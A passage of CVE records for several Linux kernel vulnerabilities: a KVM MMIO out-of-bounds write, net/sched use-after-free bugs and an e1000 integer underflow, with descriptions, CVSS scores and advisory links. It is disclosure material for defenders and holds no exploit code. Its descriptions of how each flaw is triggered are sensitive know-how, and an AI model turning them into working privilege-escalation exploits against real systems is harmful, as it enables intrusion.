              "name": "oval:org.mitre.oval:def:10637",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A10637"
            },
            {
              "name": "20091120 VMSA-2009-0016 VMware vCenter and ESX update release and vMA patch release address multiple security issue in third party components",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/507985/100/0/threaded"
            },
            {
              "name": "36562",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36562"
            },
            {
              "name": "FEDORA-2009-9044",
              "refsource": "FEDORA",
              "url": "https://www.redhat.com/archives/fedora-package-announce/2009-August/msg01256.html"
            },
            {
              "name": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0083fc2c50e6c5127c2802ad323adf8143ab7856",
              "refsource": "CONFIRM",
              "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0083fc2c50e6c5127c2802ad323adf8143ab7856"
            },
            {
              "name": "oval:org.mitre.oval:def:8405",
              "refsource": "OVAL",
              "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A8405"
            },
            {
              "name": "9352",
              "refsource": "EXPLOIT-DB",
              "url": "http://www.exploit-db.com/exploits/9352"
            },
            {
              "name": "36501",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36501"
            },
            {
              "name": "[oss-security] 20090805 Re: CVE request - kernel: information leak in sigaltstack",
              "refsource": "MLIST",
              "url": "http://www.openwall.com/lists/oss-security/2009/08/05/1"
            },
            {
              "name": "RHSA-2009:1438",
              "refsource": "REDHAT",
              "url": "http://www.redhat.com/support/errata/RHSA-2009-1438.html"
            },
            {
              "name": "ADV-2009-3316",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2009/3316"
            },
            {
              "name": "37105",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/37105"
            },
            {
              "name": "36136",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/36136"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2009-2847",
    "datePublished": "2009-08-18T20:41:00",
    "dateReserved": "2009-08-18T00:00:00",
    "dateUpdated": "2024-08-07T06:07:36.606Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2019-14821
Vulnerability from cvelistv5
Published
2019-09-19 17:37
Modified
2024-08-05 00:26
Severity
Summary
An out-of-bounds access issue was found in the Linux kernel, all versions through 5.3, in the way Linux kernel's KVM hypervisor implements the Coalesced MMIO write operation. It operates on an MMIO ring buffer 'struct kvm_coalesced_mmio' object, wherein write indices 'ring->first' and 'ring->last' value could be supplied by a host user-space process. An unprivileged host user or process with access to '/dev/kvm' device could use this flaw to crash the host kernel, resulting in a denial of service or potentially escalating privileges on the system.
References
URLTags
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14821x_refsource_CONFIRM
http://www.openwall.com/lists/oss-security/2019/09/20/1mailing-list, x_refsource_MLIST
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TRZQQQANZWQMPILZV7OTS3RGGRLLE2Q7/vendor-advisory, x_refsource_FEDORA
https://lists.debian.org/debian-lts-announce/2019/09/msg00025.htmlmailing-list, x_refsource_MLIST
https://seclists.org/bugtraq/2019/Sep/41mailing-list, x_refsource_BUGTRAQ
https://www.debian.org/security/2019/dsa-4531vendor-advisory, x_refsource_DEBIAN
https://lists.debian.org/debian-lts-announce/2019/10/msg00000.htmlmailing-list, x_refsource_MLIST
https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3QNMPENPFEGVTOFPSNOBL7JEIJS25P/vendor-advisory, x_refsource_FEDORA
https://security.netapp.com/advisory/ntap-20191004-0001/x_refsource_CONFIRM
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00037.htmlvendor-advisory, x_refsource_SUSE
http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00036.htmlvendor-advisory, x_refsource_SUSE
https://usn.ubuntu.com/4157-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4157-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-1/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4163-2/vendor-advisory, x_refsource_UBUNTU
https://usn.ubuntu.com/4162-2/vendor-advisory, x_refsource_UBUNTU
http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.htmlx_refsource_MISC
https://access.redhat.com/errata/RHSA-2019:3309vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2019:3517vendor-advisory, x_refsource_REDHAT
https://seclists.org/bugtraq/2019/Nov/11mailing-list, x_refsource_BUGTRAQ
http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.htmlx_refsource_MISC
https://access.redhat.com/errata/RHSA-2019:3978vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2019:3979vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2019:4154vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2019:4256vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0027vendor-advisory, x_refsource_REDHAT
https://access.redhat.com/errata/RHSA-2020:0204vendor-advisory, x_refsource_REDHAT
https://www.oracle.com/security-alerts/cpuapr2020.htmlx_refsource_MISC
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-05T00:26:39.131Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14821"
          },
          {
            "name": "[oss-security] 20190920 CVE-2019-14821 Kernel: KVM: OOB memory access via mmio ring buffer",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "http://www.openwall.com/lists/oss-security/2019/09/20/1"
          },
          {
            "name": "FEDORA-2019-15e141c6a7",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TRZQQQANZWQMPILZV7OTS3RGGRLLE2Q7/"
          },
          {
            "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
          },
          {
            "name": "20190925 [SECURITY] [DSA 4531-1] linux security update",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Sep/41"
          },
          {
            "name": "DSA-4531",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2019/dsa-4531"
          },
          {
            "name": "[debian-lts-announce] 20191001 [SECURITY] [DLA 1940-1] linux-4.9 security update",
            "tags": [
              "mailing-list",
              "x_refsource_MLIST",
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
          },
          {
            "name": "FEDORA-2019-a570a92d5a",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3QNMPENPFEGVTOFPSNOBL7JEIJS25P/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://security.netapp.com/advisory/ntap-20191004-0001/"
          },
          {
            "name": "openSUSE-SU-2019:2307",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00037.html"
          },
          {
            "name": "openSUSE-SU-2019:2308",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00036.html"
          },
          {
            "name": "USN-4157-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-1/"
          },
          {
            "name": "USN-4162-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-1/"
          },
          {
            "name": "USN-4157-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4157-2/"
          },
          {
            "name": "USN-4163-1",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-1/"
          },
          {
            "name": "USN-4163-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4163-2/"
          },
          {
            "name": "USN-4162-2",
            "tags": [
              "vendor-advisory",
              "x_refsource_UBUNTU",
              "x_transferred"
            ],
            "url": "https://usn.ubuntu.com/4162-2/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
          },
          {
            "name": "RHSA-2019:3309",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:3309"
          },
          {
            "name": "RHSA-2019:3517",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:3517"
          },
          {
            "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "https://seclists.org/bugtraq/2019/Nov/11"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
          },
          {
            "name": "RHSA-2019:3978",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:3978"
          },
          {
            "name": "RHSA-2019:3979",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:3979"
          },
          {
            "name": "RHSA-2019:4154",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:4154"
          },
          {
            "name": "RHSA-2019:4256",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2019:4256"
          },
          {
            "name": "RHSA-2020:0027",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0027"
          },
          {
            "name": "RHSA-2020:0204",
            "tags": [
              "vendor-advisory",
              "x_refsource_REDHAT",
              "x_transferred"
            ],
            "url": "https://access.redhat.com/errata/RHSA-2020:0204"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Kernel",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "all through 5.3"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "An out-of-bounds access issue was found in the Linux kernel, all versions through 5.3, in the way Linux kernel\u0027s KVM hypervisor implements the Coalesced MMIO write operation. It operates on an MMIO ring buffer \u0027struct kvm_coalesced_mmio\u0027 object, wherein write indices \u0027ring-\u003efirst\u0027 and \u0027ring-\u003elast\u0027 value could be supplied by a host user-space process. An unprivileged host user or process with access to \u0027/dev/kvm\u0027 device could use this flaw to crash the host kernel, resulting in a denial of service or potentially escalating privileges on the system."
        }
      ],
      "metrics": [
        {
          "cvssV3_0": {
            "attackComplexity": "HIGH",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "CHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:N/I:H/A:H",
            "version": "3.0"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-787",
              "description": "CWE-787",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2020-04-15T21:06:51",
        "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
        "shortName": "redhat"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14821"
        },
        {
          "name": "[oss-security] 20190920 CVE-2019-14821 Kernel: KVM: OOB memory access via mmio ring buffer",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "http://www.openwall.com/lists/oss-security/2019/09/20/1"
        },
        {
          "name": "FEDORA-2019-15e141c6a7",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TRZQQQANZWQMPILZV7OTS3RGGRLLE2Q7/"
        },
        {
          "name": "[debian-lts-announce] 20190925 [SECURITY] [DLA 1930-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/09/msg00025.html"
        },
        {
          "name": "20190925 [SECURITY] [DSA 4531-1] linux security update",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Sep/41"
        },
        {
          "name": "DSA-4531",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "https://www.debian.org/security/2019/dsa-4531"
        },
        {
          "name": "[debian-lts-announce] 20191001 [SECURITY] [DLA 1940-1] linux-4.9 security update",
          "tags": [
            "mailing-list",
            "x_refsource_MLIST"
          ],
          "url": "https://lists.debian.org/debian-lts-announce/2019/10/msg00000.html"
        },
        {
          "name": "FEDORA-2019-a570a92d5a",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YW3QNMPENPFEGVTOFPSNOBL7JEIJS25P/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://security.netapp.com/advisory/ntap-20191004-0001/"
        },
        {
          "name": "openSUSE-SU-2019:2307",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00037.html"
        },
        {
          "name": "openSUSE-SU-2019:2308",
          "tags": [
            "vendor-advisory",
            "x_refsource_SUSE"
          ],
          "url": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00036.html"
        },
        {
          "name": "USN-4157-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-1/"
        },
        {
          "name": "USN-4162-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-1/"
        },
        {
          "name": "USN-4157-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4157-2/"
        },
        {
          "name": "USN-4163-1",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-1/"
        },
        {
          "name": "USN-4163-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4163-2/"
        },
        {
          "name": "USN-4162-2",
          "tags": [
            "vendor-advisory",
            "x_refsource_UBUNTU"
          ],
          "url": "https://usn.ubuntu.com/4162-2/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/154951/Kernel-Live-Patch-Security-Notice-LSN-0058-1.html"
        },
        {
          "name": "RHSA-2019:3309",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:3309"
        },
        {
          "name": "RHSA-2019:3517",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:3517"
        },
        {
          "name": "20191108 [slackware-security] Slackware 14.2 kernel (SSA:2019-311-01)",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "https://seclists.org/bugtraq/2019/Nov/11"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/155212/Slackware-Security-Advisory-Slackware-14.2-kernel-Updates.html"
        },
        {
          "name": "RHSA-2019:3978",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:3978"
        },
        {
          "name": "RHSA-2019:3979",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:3979"
        },
        {
          "name": "RHSA-2019:4154",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:4154"
        },
        {
          "name": "RHSA-2019:4256",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2019:4256"
        },
        {
          "name": "RHSA-2020:0027",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0027"
        },
        {
          "name": "RHSA-2020:0204",
          "tags": [
            "vendor-advisory",
            "x_refsource_REDHAT"
          ],
          "url": "https://access.redhat.com/errata/RHSA-2020:0204"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.oracle.com/security-alerts/cpuapr2020.html"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
    "assignerShortName": "redhat",
    "cveId": "CVE-2019-14821",
    "datePublished": "2019-09-19T17:37:24",
    "dateReserved": "2019-08-10T00:00:00",
    "dateUpdated": "2024-08-05T00:26:39.131Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4206
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity
Summary
Use-after-free in Linux kernel's net/sched: cls_route component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:17:12.232Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "3.18",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "valis"
        },
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Bing-Jhong Billy Jheng"
        }
      ],
      "datePublic": "2023-08-01T03:10:37+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_route component can be exploited to achieve local privilege escalation.\n\nWhen route4_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:53:05.197Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8"
        },
        {
          "url": "https://kernel.dance/b80b829e9e2c1b3f7aae34855e04d8f6ecaf13c8"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_route component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4206",
    "datePublished": "2023-09-06T13:53:05.197Z",
    "dateReserved": "2023-08-07T13:02:24.450Z",
    "dateUpdated": "2024-08-02T07:17:12.232Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2023-4208
Vulnerability from cvelistv5
Published
2023-09-06 13:53
Modified
2024-08-02 07:17
Severity
Summary
Use-after-free in Linux kernel's net/sched: cls_u32 component
Impacted products
VendorProduct
LinuxKernel
Show details on NVD website


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T07:17:12.134Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://kernel.dance/3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://www.debian.org/security/2023/dsa-5492"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "packageName": "kernel",
          "product": "Kernel",
          "repo": "https://git.kernel.org",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "6.5",
              "status": "affected",
              "version": "3.18",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "valis"
        },
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "Muhammad Alifa Ramdhan of STAR Labs"
        }
      ],
      "datePublic": "2023-08-01T03:10:36+00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "A use-after-free vulnerability in the Linux kernel\u0027s net/sched: cls_u32 component can be exploited to achieve local privilege escalation.\n\nWhen u32_change() is called on an existing filter, the whole tcf_result struct is always copied into the new instance of the filter. This causes a problem when updating a filter bound to a class, as tcf_unbind_filter() is always called on the old instance in the success path, decreasing filter_cnt of the still referenced class and allowing it to be deleted, leading to a use-after-free.\n\nWe recommend upgrading past commit 3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81.\n\n"
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-233",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-233 Privilege Escalation"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "HIGH",
            "baseScore": 7.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-416",
              "description": "CWE-416 Use After Free",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-09-06T13:53:23.843Z",
        "orgId": "14ed7db2-1595-443d-9d34-6215bf890778",
        "shortName": "Google"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81"
        },
        {
          "url": "https://kernel.dance/3044b16e7c6fe5d24b1cdbcf1bd0a9d92d1ebd81"
        },
        {
          "url": "https://www.debian.org/security/2023/dsa-5492"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Use-after-free in Linux kernel\u0027s net/sched: cls_u32 component",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "14ed7db2-1595-443d-9d34-6215bf890778",
    "assignerShortName": "Google",
    "cveId": "CVE-2023-4208",
    "datePublished": "2023-09-06T13:53:23.843Z",
    "dateReserved": "2023-08-07T13:02:26.235Z",
    "dateUpdated": "2024-08-02T07:17:12.134Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2009-1385
Vulnerability from cvelistv5
Published
2009-06-04 16:00
Modified
2024-08-07 05:13
Severity
Summary
Integer underflow in the e1000_clean_rx_irq function in drivers/net/e1000/e1000_main.c in the e1000 driver in the Linux kernel before 2.6.30-rc8, the e1000e driver in the Linux kernel, and Intel Wired Ethernet (aka e1000) before 7.5.5 allows remote attackers to cause a denial of service (panic) via a crafted frame size.
References
URLTags
http://secunia.com/advisories/35265third-party-advisory, x_refsource_SECUNIA
http://www.mandriva.com/security/advisories?name=MDVSA-2009:135vendor-advisory, x_refsource_MANDRIVA
http://www.debian.org/security/2009/dsa-1865vendor-advisory, x_refsource_DEBIAN
http://www.securityfocus.com/archive/1/512019/100/0/threadedmailing-list, x_refsource_BUGTRAQ
http://wiki.rpath.com/Advisories:rPSA-2009-0111x_refsource_CONFIRM
http://sourceforge.net/project/shownotes.php?release_id=504022&group_id=42302x_refsource_CONFIRM
http://secunia.com/advisories/36131third-party-advisory, x_refsource_SECUNIA
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01048.htmlvendor-advisory, x_refsource_FEDORA
https://www.redhat.com/archives/fedora-package-announce/2009-June/msg01094.htmlvendor-advisory, x_refsource_FEDORA
http://secunia.com/advisories/37471third-party-advisory, x_refsource_SECUNIA
